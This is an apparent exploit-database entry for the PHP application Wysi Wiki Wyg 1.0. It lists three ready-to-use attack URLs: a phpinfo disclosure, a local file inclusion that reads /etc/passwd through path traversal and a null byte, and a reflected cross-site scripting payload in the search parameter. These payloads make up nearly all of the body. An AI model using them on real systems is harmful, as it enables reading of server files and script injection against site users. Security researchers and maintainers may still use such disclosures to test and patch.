Wysi Wiki Wyg 1.0 (LFI/XSS/PHPInfo) Remote Vulnerabilities

2008-10-20T00:00:00
ID 1337DAY-ID-3922
Type zdt
Reporter StAkeR
Modified 2008-10-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
Wysi Wiki Wyg 1.0 (LFI/XSS/PHPInfo) Remote Vulnerabilities
==========================================================


/*
   
   Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
   ----------------------------------------------------------
   By StAkeR
   http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
   ----------------------------------------------------------

  1- PHPInfo Disclosure 
  -  index.php?categup=isset
  
  2- Local File Inclusion (LFI) (MQ Off)
  -  index.php?c=../../../&a=etc/passwd%00
  
  3- Cross Site Scripting (XSS)
  -  index.php?c=wikiwizi&a=recherche&s=<script>[Javascript]</script>



*/



#  0day.today [2018-01-03]  #